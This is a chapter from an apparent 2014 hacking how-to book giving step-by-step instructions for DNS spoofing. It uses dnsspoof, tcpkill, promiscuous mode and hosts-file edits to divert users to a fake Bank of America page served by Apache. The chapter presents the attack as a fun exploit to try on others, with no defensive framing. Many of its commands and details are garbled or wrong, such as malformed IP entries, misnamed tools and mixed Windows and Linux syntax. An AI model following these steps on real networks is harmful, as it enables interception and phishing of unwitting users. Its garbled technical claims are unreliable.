Spoofing DNS to divert traffic to non-existent website - Hacking: Tapping into the Matrix: Step by Step Guide on How to Hack, including Tips, Secrets, Steps, and Hidden Traps! (2014)

Hacking: Tapping into the Matrix: Step by Step Guide on How to Hack, including Tips, Secrets, Steps, and Hidden Traps! (2014)

Chapter 6. Spoofing DNS to divert traffic to non-existent website

Here’s a fun thing you can do. You can redirect users to non-existent websites. This isn’t just about cracking codes anymore. This time, you will be exploiting the DNS or Domain Name Server. This works best on Linux, but if you can learn to let Linux run while on Windows OS, all the better.

Here’s what you should do:

1. Go to Applications> Kali Linux> Sniffing> Network Sniffers

2. Then, open DNSProof. You will then see dnsspoof -i <interface> -f <hostsfile> on your screen. As you can see, it’s quite a simple syntax—nothing like what you have learned before.

3. Find a website that you can use. For example, abc.com.

4. Then, flush the DNS of the system. To do so, close the browser and type ipconfig/flushdns followed by ifconfig etho promisc. This way, your own computer would not be infiltrated by malicious pockets as you are trying to hack the DNS.

5. You will now then work to reauthenticate Windows 7. To do so, type tcpkill -9 host [abc.com]

6. Stop tcpkill by holding CTRL + C.

7. Now, it’s time to create the host file. Type the following:

192.168.116.7.hacker

The code above will then redirect you to 192.168.117.7

8. Then, you’d notice that something like /etc/resolv./conf/. Copy this and open it with KWrite, and then type: bt> kwrite /etc/resolv.conf and then hit Enter. You have to make sure you’ll save it in this sequence: nameserver IP Address.

9. Type 75.75.75.75.

10. Now, go to /etc/nsswitch.conf—here, you’ll find the hosts and there are different kinds of them:

Dns – this helps you find the better DNS server

Mdns4_minimal – this is a multi-cast protocol legacy

Files – these are generally the file name

Mdsn4 – this one is multicast DNS

[NOTFOUND = RETURN] – this indicates that you haven’t found something yet

11. Now go check the local directory by checking out cd/usr/local.

12. Now type gvim hosts

13. Once you have opened those hosts, go to 192.168.1.101 www.abc.com –make sure to use the tab key to create a space between numerical values and “abc.com”.

14. Then, create a new webpage. This will then be the page where the user would be redirected to. Just type ifconfig eth0 –promisc followed by gvim /var/www/index.html.

15. You would then see something like this onscreen:

<html>

<body> <h1>This is the Fake Bank of America Web Site! </h1>

</body>

</html)>

16. Start an Apache Web Server. This is built into Kali so it wouldn’t be that hard. Just go to Kali Linux > System Services> HTTP> Apache.

17. Now, you can start DNSSpoof. This will send those users to your fake website and would intercept any kind of queries. Just type dnsspoof -f hosts.

18. Finally, you’d be able to see the address www.abc.com onscreen—but it will just be a blank screen! Voila! You have now spoofed the DNS!